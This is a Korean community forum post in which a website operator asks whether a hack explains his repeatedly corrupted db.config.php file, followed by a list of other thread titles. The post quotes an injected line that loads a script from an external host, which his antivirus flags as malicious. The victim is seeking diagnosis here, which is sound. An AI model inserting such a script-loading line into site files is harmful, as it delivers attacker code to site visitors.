묻고답하기

안녕하세요.

몇일 전부터 제가 운영하는 사이트가 한번씩 접속이 안되는 일이 있었습니다.

로그를 보니까 db.config.php 부분에 문제가 있다고 나와서 확인하니 파일 내용이 깨져 있었습니다.

그래서 백업해둔 파일로 대체해서 올리는 형식으로 해결했습니다.

하지만어째서 한번씩 파일이 깨지는건지에 대한 이유는 전혀 모르는 상태였습니다.

문제는 오늘도 그런 상황이 생겨서 바로 db.config.php를 교체하려고 했는데

이번에는 기본 내용의 마지막줄에 특정 스크립트를 불러오는 코드가 포함되어 있는것을 확인했습니다.

 

  'sitelock_message' => 'Maintenance in progress...'
);
<script src="http://shoestring.co.kr/xxe/dd/12.js"></script>

 

이런식으로 코드가 db.config.php에 포함되어 있었습니다.

저런식으로 수정되면 당연히 사이트 접속이 안되니까 바로 발견했습니다.

저 주소로 들어가보니 어베스트 백신이 막는것으로 봐서는 해킹과 관련이 있을거라고 생각됩니다..

다만 원인을 모르겠는 부분은 전 22번 포트를 방화벽으로 막아놨고 로그를 확인해보니 root 계정을 포함해서 저 이외에 로그인한 기록이 없습니다.

방화벽도 설정이 되어있고 sshd에서도 제 IP만을 허용해둔 상태입니다. 아마 기본적인 보안설정은 해둔거라고 생각합니다.

만약 가능성이 있다면 방화벽 차단을 넘어서 접속을 했다는 부분이 되는데...

db.config.php를 수정한걸 보면 sftp혹은 ssh으로 접속한거라고 생각합니다.

이거 해킹시도라고 볼 수 있는 부분인가요?

근데 방화벽을 넘어서 오는 해킹이라니 도저히 막을 방법이 생각나지 않네요..

일단 패스워드는 전부 더 복잡해서 변경은 해놨는데 걱정입니다

 

글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
마희 익명 게시판 스케치북 방명록형 관리자만 닉네임 보이게하는 방법이 궁금합니다. [2] 2015.12.02 by 마희
deok 관리자페이지 레이아웃이 안나옵니다. [1] file 2015.12.02 by DoorWeb
ㅊㄷㄱ db과부하 글 썼던 사람입니다 [1] 2015.12.02 by ㅊㄷㄱ
super333 xe 설치가 안되요. 서버타입 문제인가요? [2] 2015.12.02 by patou
좀밤농구 최근게시물 표시방법에 관해 질문드립니다 [2] 2015.12.02 by patou
레이저팩토리 상위카테고리 클릭시 하위카테고리 글까지 보이게하는 방법. [1] 2015.12.02 by GG
ㅎㅕㄴㅣㄴㅔ 마켓플레이스 장터모듈을 사용하고 있는데요.. [2] file 2015.12.02 by GG
리미트 외부 페이지에서 mysql_close 시 에러 발생합니다. [2] 2015.12.02 by 리미트
말종 진짜 급해서 그럽니다..서버에서 제거... [3] file 2015.12.02 by patou
게고코고 xe 방문자 수 정확한 건가요? [2] 2015.12.02 by 큰돌♡
웨이브쿡 모듈이름 변경후 관리자 페이지에 모든 메뉴가 안됩니다. [1] 2015.12.01 by sejin7940
원동원 X3 호스팅 관련 문의 [2] 2015.12.01 by 퍼니엑스이
xe초보자 자기 게시물에 쓴 댓글 수만 출력하려면? [1] 2015.12.01 by sejin7940
lemon 스케쥴 모듈 DB  
좀밤농구 게시물 5개만 홈페이지 메인에 보여주고 싶습니다. [1] 2015.12.01 by Double'U'
루이 PHP 5.2 => 5.3 서버이전 문의  
WCGM XEDITION 레이아웃 가로(폭) 고정 방법? [3] 2015.12.01 by ehii
lemon 로그인 오류 현상 일어납니다. [2] 2015.12.01 by lemon
Volun 게시판 피드 공개 기본값 변경  
다롱이397b7 누리고 에서 상품타입은 어떻게 선택 하나요 file